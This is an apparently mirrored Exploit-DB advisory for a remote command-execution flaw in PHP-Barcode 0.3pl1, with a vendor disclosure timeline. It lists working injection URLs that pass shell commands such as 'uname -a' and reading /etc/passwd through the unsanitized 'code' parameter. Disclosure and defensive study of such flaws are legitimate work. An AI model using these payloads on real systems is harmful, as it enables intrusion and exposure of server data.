exploit-db-mirror/exploits/php/webapps/17573.txt
Offensive Security 36c084c351 DB: 2021-09-03
45419 changes to exploits/shellcodes

2 new exploits/shellcodes

Too many to list!
2021-09-03 13:39:06 +00:00

28 lines
No EOL
653 B
Text

PHP-Barcode 0.3pl1 Remote Code Execution
The input passed to the code parameter is not sanitized and is used on
a popen() function. This allows remote command execution and also
allows to see environment vars:
Windows
http://www.site.com/php-barcode/barcode.php?code=%TMP%
Linux
http://www.site.com/php-barcode/barcode.php?code=012$PATH$d
http://www.site.com/php-barcode/barcode.php?code=`uname%20-a`
http://www.site.com/php-barcode/barcode.php?code=`tail%20-1%20/etc/passwd`
Vendor:
http://www.ashberg.de/php-barcode/download/
Vendor informed:
July 6 / 2011
Vendor acknowledgement:
July 7 / 2011
Fix not available from vendor.
- beford